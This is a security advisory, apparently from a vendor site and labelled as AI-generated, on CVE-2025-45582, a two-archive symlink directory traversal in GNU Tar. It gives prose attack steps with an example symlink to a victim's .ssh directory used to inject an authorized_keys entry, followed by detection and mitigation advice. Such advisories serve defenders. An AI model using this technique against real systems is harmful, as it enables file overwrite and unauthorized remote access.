CVE-2025-45582 Overview
CVE-2025-45582 is a directory traversal vulnerability in GNU Tar through version 1.35 that allows attackers to overwrite arbitrary files using crafted TAR archives. This vulnerability exploits a two-step process involving symlinks to bypass the standard protection mechanism against path traversal attacks.
Critical Impact
Successful exploitation can lead to arbitrary file overwrites, potentially compromising SSH authentication keys, configuration files, or other sensitive system files through a symlink-based directory traversal attack.
Affected Products
- GNU Tar through version 1.35
- Server applications that automatically extract user-supplied TAR archives
- Software installation processes using multiple tar xf operations in the same directory
Discovery Timeline
- 2025-07-11 - CVE-2025-45582 published to NVD
- 2025-11-02 - Last updated in NVD database
Technical Details for CVE-2025-45582
Vulnerability Analysis
This directory traversal vulnerability exploits a design limitation in GNU Tar's protection mechanism against path traversal attacks. While GNU Tar correctly blocks single archives containing ../ sequences in member names with the error "Member name contains '..'", it fails to account for a multi-archive attack scenario.
The vulnerability requires the victim to extract two specially crafted archives sequentially. The first archive contains a symlink pointing to a sensitive directory outside the extraction path (e.g., x -> ../../../../../home/victim/.ssh). The second archive contains a file that references the symlink name followed by a critical filename (e.g., x/authorized_keys).
When the second archive is extracted, GNU Tar follows the symlink created by the first archive and writes the malicious file to the target directory, effectively bypassing the traversal protection. This attack is particularly dangerous in automated environments where multiple archives are processed sequentially, such as package managers installing dependencies or CI/CD pipelines processing user-supplied tarballs.
Root Cause
The root cause lies in GNU Tar's path traversal protection mechanism only examining individual archive members in isolation. The security check for ../ sequences does not account for the cumulative effect of extracting multiple archives into the same directory, where symlinks from a previous extraction can be leveraged to escape the intended directory structure. This represents a violation of the principle of least privilege and defense in depth, as documented in CWE-24 (Path Traversal: '../filedir').
Attack Vector
The attack requires local access and user interaction, following this two-step exploitation process:
First Archive Extraction: The attacker crafts a TAR archive containing a symlink that points to a sensitive directory using relative path traversal. For example, a symlink named x pointing to ../../../../../home/victim/.ssh.
Second Archive Extraction: A second TAR archive contains a file with a relative path that begins with the symlink name. For example, x/authorized_keys containing the attacker's public key.
When the victim extracts both archives into the same directory (a common practice in automated systems), the second extraction follows the symlink and overwrites the target file. In the example above, this would inject an attacker-controlled SSH key into the victim's authorized_keys file, enabling unauthorized remote access.
This attack is especially effective against:
- Server applications that automatically extract user-supplied archives
- Package installation processes that extract multiple dependency tarballs
- Build systems processing untrusted archive inputs
Detection Methods for CVE-2025-45582
Indicators of Compromise
- Unexpected symlinks in extraction directories pointing outside the intended path
- Modified sensitive files (e.g., .ssh/authorized_keys, configuration files) with timestamps correlating to TAR extraction operations
- Log entries showing multiple sequential tar xf operations on untrusted archives
Detection Strategies
- Monitor file system operations during TAR extraction for symlink creation pointing to directories outside the extraction path
- Implement integrity monitoring on critical system files that could be targeted (SSH keys, configuration files, startup scripts)
- Audit extraction directories for symlinks with ../ components in their target paths
- Deploy file integrity monitoring tools to detect unexpected modifications to sensitive files
Monitoring Recommendations
- Enable detailed logging for TAR extraction operations in automated systems
- Implement real-time alerts for symlink creation in extraction directories
- Monitor for unauthorized modifications to authentication credential files
- Review package installation logs for evidence of multiple untrusted TAR extractions
How to Mitigate CVE-2025-45582
Immediate Actions Required
- Audit systems running automated TAR extraction processes and implement isolation measures
- Use the --one-top-level option when extracting untrusted archives to enforce extraction into a dedicated directory
- Follow GNU Tar's security guidelines by using an empty directory for each tar xf operation
- Consider using --no-overwrite-dir and --keep-old-files options to prevent overwrites
Patch Information
No official patch has been released at the time of publication. System administrators should consult the GNU Tar Bug Report and OpenWall OSS Security Discussion for the latest updates on remediation guidance. The GNU Tar Security Guidelines provide best practices for secure archive extraction.
Workarounds
- Create a fresh, empty directory for each tar xf operation as recommended in the GNU Tar manual
- Use the --one-top-level flag to force extraction into a new subdirectory
- Validate archive contents with tar -tvf before extraction to inspect for suspicious symlinks
- Implement sandboxing or containerization for processes that extract untrusted archives
# Secure extraction configuration example
# Create isolated directory for each extraction
mkdir -p /tmp/safe_extract_$$
cd /tmp/safe_extract_$$
# Extract with protection options
tar --one-top-level --no-overwrite-dir -xf untrusted_archive.tar
# Verify no suspicious symlinks exist before processing
find . -type l -exec ls -la {} \;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
